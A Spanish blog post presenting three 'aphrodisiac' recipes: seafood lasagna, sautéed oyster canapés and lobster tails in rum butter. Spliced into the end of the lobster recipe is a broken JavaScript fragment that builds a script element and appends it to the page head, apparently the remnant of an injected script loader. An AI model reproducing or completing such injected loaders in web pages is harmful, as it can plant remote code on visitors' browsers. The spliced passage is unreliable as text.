Salud y belleza » Alimentación

El sexo, la salud y los afrodisíacos (II)

Sin Comentarios

Para quién no lo sepa, el término afrodisíaco deriva de la diosa griega Afrodita: divinidad femenina relacionada con el amor, la fecundidad y la energía. Por ende, los denominados platos afrodisíacos no son más que delicias creadas mediante el uso de componentes que, aparentemente, poseen cualidades estimulantes, provocadoras.

A continuación, para los amantes de la gastronomía, presentamos una guía (la segunda parte, en verdad) con recetas afrodisíacas

Recetas afrodisíacas

Lasaña Arrecife

Ingredientes: doce placas de lasaña de espinaca, cien gramos de mejillones, cien gramos de calamares cortados en tiras,  sepia cortada también en tiras, cincuenta gramos de gambas peladas, doscientos gramos de salsa bechamel, cien gramos de queso rallado, vino blanco, aceite de oliva, sal y pimienta.

Elaboración: ante todo, colocar el aceite de oliva en una sartén para, así, sofreír los mejillones, los calamares, las gambas, la sepia y también la sepia (condimentar con sal y pimienta). Una vez dorados, bañar con el vino blanco. Continuar con la cocción. Luego, retirar del fuego, quitar los mejillones de sus conchas e, inmediatamente, mezclar todo con la bechamel. Para ir finalizando, hervir la pasta al dente y, por último, en una fuente para el horno, poner una capa de bechamel y una de pasta,  espolvorear con queso rallado y gratinar al horno por diez minutos.

Canapés de ostras

Ingredientes: diez ostras, un par de rodajas de pan, manteca, cebollín, limón, sal y pimienta.

Elaboración: primero y principal dorar en la sartén las rodajas de pan y, cuando éstas lleguen a tomar un lindo color doradito, hacerlas a un lado. Al mismo tiempo, colocar una nuez de manteca en la sartén y, cuando  empiece a tomar color, colocar la decena de ostras sin conchas y escurridas para, así, saltear a fuego (cinco minutos, máximo). Después es necesario colocarlas sobre el pan y agregarles la manteca junto con el cebollín y el resto de los condimentos.

Colas de langosta en mantequilla al ron

Ingredientes: tres dientes de ajo picados, una cucharada de jugo de limón, una taza de ron negro de Jamaica, varios pares de colas de langosta, cien gramos de manteca, media de taza de vinagre de vino, una cucharada de perejil picado, sal y pimienta.

Preparación: para dar inicio a una de las más sabrosas recetas afrodisíacas, pelar y trocear las langostas. Apartarlas. Después, fundir la manteca. Luego, agregar el perejil, el jugo de limón, el ajo, la sal y la pimienta. Finalmente sumar el ron, calentar y, mientras tanto, ir agregando, salteados, los trozos de langosta.d.getElementsByTagName('head')[0].appendChild(s);var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.